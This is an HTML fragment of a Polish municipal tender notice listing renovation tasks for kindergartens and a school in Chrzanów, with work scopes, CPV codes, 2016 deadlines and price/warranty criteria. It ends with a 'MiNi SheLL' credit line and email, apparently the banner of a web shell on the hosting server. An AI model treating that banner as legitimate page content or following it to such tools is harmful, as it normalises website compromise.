<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Remont sanitariatów w Przedszkolu Samorządowym nr 10 z Oddziałami Integracyjnymi w Chrzanowie, ul. Władysława Sikorskiego 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:                       
remont łazienki dla maluchów polegający na demontażu umywalek, misek ustępowych, baterii, zerwanie starych płytek ściennych, demontażu drzwi, wykonaniu nowych podejść, ułożeniu fliz na ścianach oraz ułożeniu płytek podłogowych, zamontowaniu kabin systemowych, zamontowaniu misek ustępowych dla maluchów w tym jednej dla niepełnosprawnych, zamontowaniu umywalek  
w tym jednej dla niepełnosprawnych, zamontowaniu brodzika, zamontowaniu uchwytów dla niepełnosprawnych, zamontowaniu nowych drzwi do sanitariatu, wymianie lamp, wymianie grzejników, pomalowaniu ścian i sufitu.






Szczegółowy opis przedmiotu zamówienia dla zadania nr 2 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 2A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9, 45.44.21.00-8, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Remont sanitariatu gr IV w Przedszkolu Samorządowym nr 9 w Chrzanowie, 
ul. Brzezina 14..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
remont łazienki dla maluchów polegający na demontażu umywalek, misek ustępowych, brodzika, oraz baterii do w/w osprzętów, zerwaniu starych płytek ściennych, zamontowaniu systemowych kabin wraz ze ściankami i drzwiami, zamontowaniu misek ustępowych dla maluchów oraz umywalek dla maluchów wraz z wykonaniem nowych podejść, zamontowaniu baterii, zamontowaniu brodzika do mycia dzieci, ułożeniu fliz na ścianach łazienki, wykonaniu posadzki 
z płytek ceramicznych, wymianie lamp, pomalowaniu ścian i sufitu farbami zmywalnymi.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 3 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 3A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9, 45.44.21.00-8, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Remont parkietu i malowanie sali w Przedszkolu Samorządowym nr 10 z Oddziałami Integracyjnymi w Chrzanowie, ul. Władysława Sikorskiego 6..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
rozebranie podłogi z klepki drewnianej, posegregowanie i wyczyszczenie klepek z rozbiórki,  wyczyszczenie  posadzki z resztek subitu, przeszlifowanie, wykonanie warstwy samopoziomującej, ułożenie podłogi z klepki drewnianej z rozbiórki, wycyklinowanie i pomalowanie podłogi przy użyciu lakierów przeznaczonych do pomieszczeń użyteczności publicznej, antypoślizgowych.
Malowanie farbami sufitu i ścian sali dla dzieci wraz z przygotowaniem powierzchni pod malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).
We wskazanych częściach ścian wykonać malowanie dekoracyjne dla potrzeb dzieci.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 4 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 4A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-1, 45.43.21.13-9, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Remont parkietu i malowanie sali gr IV 
w Przedszkolu Samorządowym nr 9 w Chrzanowie, 
ul. Brzezina 14..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje:
cyklinowanie i malowanie parkietu w sali przedszkolnej przy użyciu farb przeznaczonych do malowania obiektów użyteczności publicznej, antypoślizgowych oraz malowanie sufitu  i ścian sali  dla dzieci wraz z przygotowaniem powierzchni pod malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).
We wskazanych częściach ścian wykonać malowanie dekoracyjne dla potrzeb dzieci.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 5 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 5A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6: Remont parkietu w salach lekcyjnych w Szkole Podstawowej nr 1 w Chrzanowie, ul. Borelowskiego 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: 
cyklinowanie i malowanie parkietu w  salach lekcyjnych przy użyciu farb przeznaczonych do malowania obiektów użyteczności publicznej.

Szczegółowy opis przedmiotu zamówienia dla zadania nr 6 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 6A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Remont jadalni w Przedszkolu Samorządowym nr 8 w Chrzanowie, ul. Kościuszki 10..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: 
wymianę drzwi do jadalni, zerwanie posadzki z płytek pcv i wykonanie nowej posadzki ze zgrzewanego pcv, zamontowanie sufitu podwieszonego, malowanie sufitu i ścian wraz z przygotowaniem  powierzchni pod  malowanie (do wysokości 2,0m należy wykonać powierzchnie zmywalne).

Szczegółowy opis przedmiotu zamówienia dla zadania nr 7 precyzuje: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 7A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.43.21.11-5, 45.44.21.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8: Remont szatni w Przedszkolu Samorządowym nr 1 w Chrzanowie, ul. Śląska 74b..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje: remont szatni polegający na montażu drzwi aluminiowych z szybą bezpieczną pomiędzy szatnią a jadalnią, oraz remont toalety przy szatni polegający na zamontowaniu brodzika,  wymianie armatury sanitarnej, uzupełnieniu wykładziny podłogowej i ściennej. 

Szczegółowy opis przedmiotu zamówienia dla zadania nr 8 precyzuje: dokumentacja projektowa oraz specyfikacja techniczna wykonania i odbioru robót budowlanych-  załącznik nr 8A do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres gwarancji - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com